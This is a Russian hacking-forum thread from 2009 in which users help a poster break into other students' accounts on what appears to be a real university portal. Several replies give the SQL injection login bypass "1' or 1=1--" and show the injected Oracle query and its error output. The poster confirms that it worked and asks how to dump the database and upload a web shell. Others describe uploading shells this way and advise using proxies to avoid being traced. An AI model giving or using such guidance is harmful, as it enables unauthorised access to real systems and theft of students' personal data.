Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.08.2009, 11:29
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391
Репутация:
0
|
|
Сообщение от jokester
Предложу заюзать скуль в авторизации 
' or 1=1--
Ну а если что-то непонятно, то почитать статьи шутку не оценил, насчет почитать статьи это и сам знаю, я спрашивал конкретно, в связи с типом сервера и тд
а свой лог/пасс у меня есть, мне надо чужие просмотреть
Последний раз редактировалось Raz0rnsk; 09.08.2009 в 11:32..
|
|
|
09.08.2009, 11:55
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Ну вообще-то я не шутил, там скуль в авторизации войти можно вставив в поле логин значение
1' or 1=1-- а поле пароль любое.
А статьи я рекомендовал почитать, если непонятно, что именно я тебе посоветовал. И если ты всё-же последуешь моему совету и сделаешь это, то возможно поймёшь как можно зайти под ЛЮБЫМ пользователем.
FireFenix
Вы тут что, издеваетесь что-ли все? Я для кого это писал вообще?
|
|
|
|
09.08.2009, 12:51
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 13
Провел на форуме:
63551
Репутация:
13
|
|
Сообщение от Raz0rnsk
шутку не оценил, насчет почитать статьи это и сам знаю, я спрашивал конкретно, в связи с типом сервера и тд
а свой лог/пасс у меня есть, мне надо чужие просмотреть Кроме шуток, чем тебя не устраивает классическая инъекция в where в поле авторизации?
Запрос у нас будет выглядеть примерно следующим образом:
Код:
SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression]
|
|
|
|
09.08.2009, 13:56
|
|
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317
Репутация:
209
|
|
Насчёт or 1=1, попадались пару сайтов сделаных в 2008 - 2009 годах,в админке проканал данный способ, залил шелл))
Мораль такова: надо пробывать все возможные способы, ну для начало почитать статьи которых на ачате полно, а потом задавать вопросы)
|
|
|
|
09.08.2009, 14:11
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Джокстер просто неумеет хакерствовать с хспайдером вот и завидует
|
|
|
|
09.08.2009, 19:03
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391
Репутация:
0
|
|
Сообщение от jokester
Ну вообще-то я не шутил, там скуль в авторизации войти можно вставив в поле логин значение
1' or 1=1-- а поле пароль любое.
А статьи я рекомендовал почитать, если непонятно, что именно я тебе посоветовал. И если ты всё-же последуешь моему совету и сделаешь это, то возможно поймёшь как можно зайти под ЛЮБЫМ пользователем.
FireFenix
Вы тут что, издеваетесь что-ли все? Я для кого это писал вообще?
сори, что погорячился.
получилось
но я вообще хотел, зная вид(по своим данным), заходить под конкретным пользователем, может базу как-то слить?
а раз проканывает заходить под 1' or 1=1--, шелл получится залить?
|
|
|
|
09.08.2009, 19:17
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 6
Провел на форуме:
79391
Репутация:
0
|
|
Сообщение от fraIzer
Кроме шуток, чем тебя не устраивает классическая инъекция в where в поле авторизации?
Запрос у нас будет выглядеть примерно следующим образом:
Код:
SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression]
ввел в логин
получил
К сожалению, в настоящий момент продолжение работы невозможно. Примите извинения за доставленные неудобства.
ошибка при попытке авторизации студента
ошибка БД: SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936' and t.SPASSWORD='9862C0CBF9702F2883680ACFFE8768DD' and t.idstudent is not NULL [nativecode=ORA-01756: quoted string not properly terminated]
файл: /www/web/sites/student_study/index.php:55
|
|
|
|
09.08.2009, 20:08
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
еммм ты хотяб предохраняешься?)
юзай http://hidemyass.com/ или proxya.ru
а то логи-то сохраняются))смотри свои данные не пиши)
|
|
|
|
09.08.2009, 20:32
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
ТС, https://forum.antichat.ru/thread40576.html
пока 4 раза не перечитаешь эту статью, больше сюда не пиши
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
